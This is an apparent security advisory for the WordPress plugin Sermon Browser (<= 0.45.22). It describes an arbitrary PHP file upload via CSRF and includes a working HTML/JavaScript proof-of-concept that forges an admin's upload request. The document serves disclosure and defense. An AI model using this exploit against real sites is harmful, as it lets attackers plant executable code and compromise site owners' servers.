WordPress Plugin Vulnerabilities

Sermon Browser <= 0.45.22 - Arbitrary File Upload via CSRF

Description

The plugin does not have CSRF checks in place when uploading Sermon files, and does not validate them in any way, allowing attackers to make a logged in admin upload arbitrary files such as PHP ones.

Proof of Concept

<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https:\/\/example.com\/wp-admin\/admin.php?page=sermon-browser\/files.php", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------271015847919477243333798421416");
        xhr.withCredentials = true;
        var body = "-----------------------------271015847919477243333798421416\r\n" + 
          "Content-Disposition: form-data; name=\"upload\"; filename=\"file.php\"\r\n" + 
          "Content-Type: text/php\r\n" + 
          "\r\n" + 
          "\x3c?php echo \'FAILED\'; ?\x3e\n" + 
          "\r\n" + 
          "-----------------------------271015847919477243333798421416\r\n" + 
          "Content-Disposition: form-data; name=\"save\"\r\n" + 
          "\r\n" + 
          "Upload \xc2\xbb\r\n" + 
          "-----------------------------271015847919477243333798421416--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

Or, as admin, upload a PHP file via the Sermon > Files feature of the plugin.

The file will be at https://example.com/wp-content/uploads/sermons/file.php